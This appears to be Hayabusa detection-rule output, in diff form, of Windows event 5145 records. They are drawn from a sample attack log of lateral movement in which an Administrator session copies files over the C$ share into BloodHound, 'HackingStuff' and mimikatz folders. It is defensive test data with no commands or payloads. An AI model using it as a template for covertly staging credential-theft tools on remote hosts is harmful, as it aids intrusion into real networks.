+2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\umd | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\setimmediate | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\signal-exit | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain\tests | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\filters | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\streamers | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\tests | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\example | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test\server | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\unzipper | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\es5 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\esnext | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src\schemes | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\tests | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\util-deprecate | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\voc | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\warning | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\wrappy | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\write-file-atomic | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Float | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Menu | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Modals | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer\Tabs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Spotlight | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Zoom | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\css | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\fonts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\img | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\js | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\HackingStuff | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\HackingStuff\logs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\mimikatz_trunk | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\mimikatz_trunk\Win32 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
